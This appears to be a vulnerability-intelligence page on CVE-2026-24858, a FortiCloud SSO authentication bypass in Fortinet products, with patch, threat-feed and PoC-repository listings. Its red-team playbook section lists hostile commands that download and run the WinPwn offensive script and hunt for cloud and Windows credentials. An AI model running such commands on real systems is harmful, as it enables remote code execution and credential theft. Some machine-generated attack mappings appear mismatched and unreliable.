CVE-2026-24858
Overview
This vulnerability is an authentication bypass caused by improper validation of FortiCloud SSO authentication tokens. The flaw resides in Fortinet FortiOS and associated products, where the authentication mechanism fails to correctly verify user-device bindings. This allows an attacker with a valid FortiCloud account and a registered device to exploit alternate authentication paths, bypassing standard credential checks within the FortiCloud SSO integration component.
Vulnerability Description
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.5, FortiAnalyzer 7.4.0 through 7.4.9, FortiAnalyzer 7.2.0 through 7.2.11, FortiAnalyzer 7.0.0 through 7.0.15, FortiManager 7.6.0 through 7.6.5, FortiManager 7.4.0 through 7.4.9, FortiManager 7.2.0 through 7.2.11, FortiManager 7.0.0 through 7.0.15, FortiNAC-F 7.6.3 through 7.6.5, FortiOS 7.6.0 through 7.6.5, FortiOS 7.4.0 through 7.4.10, FortiOS 7.2.0 through 7.2.12, FortiOS 7.0.0 through 7.0.18, FortiProxy 7.6.0 through 7.6.4, FortiProxy 7.4.0 through 7.4.12, FortiProxy 7.2.0 through 7.2.15, FortiProxy 7.0.0 through 7.0.22, FortiWeb 8.0.0 through 8.0.3, FortiWeb 7.6.0 through 7.6.6, FortiWeb 7.4.0 through 7.4.11 may allow an attacker with a FortiCloud account and a registered device to log into other devices registered to other accounts, if FortiCloud SSO authentication is enabled on those devices.
Impact
An attacker with a valid FortiCloud account and a registered device can authenticate to devices registered to other users without possessing their credentials. This enables unauthorized access to administrative interfaces across multiple Fortinet products, potentially exposing sensitive configuration data and allowing lateral movement within networks. No additional user interaction or elevated privileges beyond a registered FortiCloud account are required, increasing the ease of exploitation and the risk of compromise for organizations using FortiCloud SSO authentication.
Solution
Fortinet has released security updates addressing this vulnerability in FortiOS versions 7.0.19, 7.2.13, 7.4.11, and 7.6.6, as well as corresponding patches for FortiAnalyzer, FortiManager, FortiProxy, and FortiWeb. Administrators should apply these vendor-supplied patches promptly. Detailed remediation instructions and advisory information are available at Fortinet’s official PSIRT page: https://fortiguard.fortinet.com/psirt/FG-IR-26-060.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in Fortinet's products stems from an authentication bypass issue that allows an attacker with a FortiCloud account and a registered device to gain unauthorized access to other devices registered under different accounts. This flaw is particularly concerning because it exploits the Single Sign-On (SSO) feature enabled on FortiAnalyzer, FortiManager, FortiOS, FortiProxy, and FortiWeb systems. The underlying issue arises from improper validation of authentication tokens, which can be manipulated to bypass security controls. As a result, an attacker can potentially access sensitive data and administrative functionalities of devices they should not have access to, leading to significant security breaches.
Attack vectors for this vulnerability are varied and can be executed with relative ease by malicious actors. An attacker could leverage their own FortiCloud account to authenticate against any of the affected devices, provided that SSO authentication is enabled. This means that an attacker does not need to compromise the target device directly; instead, they can exploit the trust relationship established through the SSO mechanism. Scenarios could include accessing sensitive logs, altering configurations, or even deploying malicious updates, all of which could have devastating consequences for the integrity and confidentiality of the network infrastructure.
The real-world impact of this vulnerability is profound, particularly for organizations relying on Fortinet's products for network security and management. Given the critical nature of the affected systems, a successful exploitation could lead to unauthorized access to sensitive information, disruption of services, and potential data breaches. The business risks are substantial, including financial losses, reputational damage, and regulatory penalties, especially if sensitive customer data is compromised. Organizations may face increased scrutiny from stakeholders and regulatory bodies, potentially leading to long-term consequences that extend beyond immediate financial impacts.
To detect and mitigate this vulnerability, organizations should prioritize immediate updates to the latest versions of the affected Fortinet products, as these updates include patches designed to close the authentication bypass loophole. Additionally, implementing strict access controls and monitoring for unusual login attempts can help detect potential exploitation attempts. Regular audits of account permissions and SSO configurations are also advisable to ensure that only authorized devices and users have access to critical systems. Furthermore, organizations should consider employing multi-factor authentication (MFA) to add an additional layer of security, making it more difficult for attackers to gain unauthorized access, even if they possess valid credentials.
In conclusion, the authentication bypass vulnerability in Fortinet's products represents a significant threat to the security posture of organizations utilizing these systems. The ease of exploitation and the potential for severe consequences necessitate immediate attention from cybersecurity teams. By understanding the technical aspects of the vulnerability, recognizing the potential attack vectors, assessing the real-world impact, and implementing robust detection and mitigation strategies, organizations can better protect themselves against this and similar threats in the future.
Recent telemetry from CSURFACE threat intelligence indicates a marked reduction in detection activity related to CVE-2026-24858, despite a significant increase in the Exploit Prediction Scoring System (EPSS) value, which more than doubled. This divergence suggests that while active exploitation attempts observed by our sensors have declined, the vulnerability remains highly attractive to adversaries, as evidenced by the rising EPSS and the continued availability of multiple proof-of-concept exploits in public repositories. The slight downward adjustment of the CVSS score from 9.8 to 9.4 reflects refined understanding of the vulnerability’s impact but does not diminish its critical severity. Importantly, ransomware groups previously associated with Fortinet product exploits have not demonstrated high-confidence use of this vulnerability, though the persistence of publicly accessible exploit code maintains a latent risk for opportunistic attackers. For defenders, this evolving landscape underscores the need for vigilant monitoring, as the gap between observed exploitation and exploitability may indicate emerging attack techniques or shifts in adversary focus. Consequently, the overall threat level remains critical, with potential for rapid escalation should exploitation activity intensify.
Update 2 — June 15, 2026
CSURFACE threat intelligence has identified a significant increase in the Exploit Prediction Scoring System (EPSS) for CVE-2026-24858, rising sharply to place this vulnerability in the 0.99th percentile of exploitability. This surge is accompanied by a marked decrease in detection activity across our sensors, suggesting adversaries may be refining their tactics or leveraging stealthier methods to exploit the authentication bypass flaw in Fortinet FortiOS and related products. Concurrently, new proof-of-concept exploits have emerged publicly, highlighting ongoing research and potential weaponization efforts targeting the FortiCloud Single Sign-On mechanism. Although ransomware groups previously linked to Fortinet exploits have not yet demonstrated high-confidence use of this vulnerability, the rapid increase in EPSS and the availability of exploit code elevate the latent risk of opportunistic attacks. This dynamic shift underscores a heightened threat environment where the gap between observed exploitation and exploitability metrics signals potential for imminent escalation. Consequently, the overall risk level for organizations using affected Fortinet products should be considered critically elevated, warranting intensified vigilance despite the current reduction in observable attack activity.
Affected Products (19)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortinet | Fortianalyzer | All |
cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortianalyzer | All |
cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortianalyzer | All |
cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortianalyzer | All |
cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortimanager | All |
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortimanager | All |
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortimanager | All |
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortimanager | All |
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiproxy | All |
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiproxy | All |
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiproxy | All |
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiproxy | All |
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiweb | All |
cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortios | All |
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortios | All |
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortios | All |
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortios | All |
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (5)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
absholi7ly/CVE-2026-24858-FortiCloud-SSO-Authentication-Bypass
CVE-2026-24858 FortiCloud Single Sign On (SSO) a factory default enabled feature once you register any FortiGate/FortiM...
|
absholi7ly | 6 | 3 | 2026-01-30 | View |
|
gagaltotal/cve-2026-24858
CVE-2026-24858 - Administrative FortiCloud SSO authentication bypass
|
gagaltotal | 1 | 2 | 2026-02-10 | View |
|
SimoesCTT/SCTT-2026-33-0004-FortiCloud-SSO-Identity-Singularity
While Fortinet's January 27, 2026 mitigation for **CVE-2026-24858** focuses on blocking specific accounts like `cloud-no...
|
SimoesCTT | 0 | 0 | 2026-01-31 | View |
|
m0d0ri205/CVE-2026-24858
아직 제로데이인거 같아, 공개되거나 천천히 분석할 예정....
|
m0d0ri205 | 0 | 0 | 2026-01-28 | View |
|
SimoesCTT/-CTT-NSP-Convergent-Time-Theory---Network-Stack-Projection-CVE-2026-24858-
A Proof-of-Concept demonstrating the application of 3D Navier-Stokes CTT formulations to packet flow optimization and d...
|
SimoesCTT | 0 | 0 | 2026-01-30 | View |
Threat Feed
11 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-665 | Exploitation of Thunderbolt Protection Flaws |
40%
|
Low | Very High | |
| CAPEC-127 | Directory Indexing |
30%
|
High | Medium |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-24858 |
| fortiguard.fortinet.com |
GitHub CVE
|
https://fortiguard.fortinet.com/psirt/FG-IR-26-060 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-24858 |
| fortinet.com |
NVD API
Mitigation
Vendor Advisory
|
https://www.fortinet.com/blog/psirt-blogs/analysis-of-sso-abuse-on-fortios |
| cert-portal.siemens.com |
NVD API
Third Party Advisory
|
https://cert-portal.siemens.com/productcert/html/ssa-975644.html |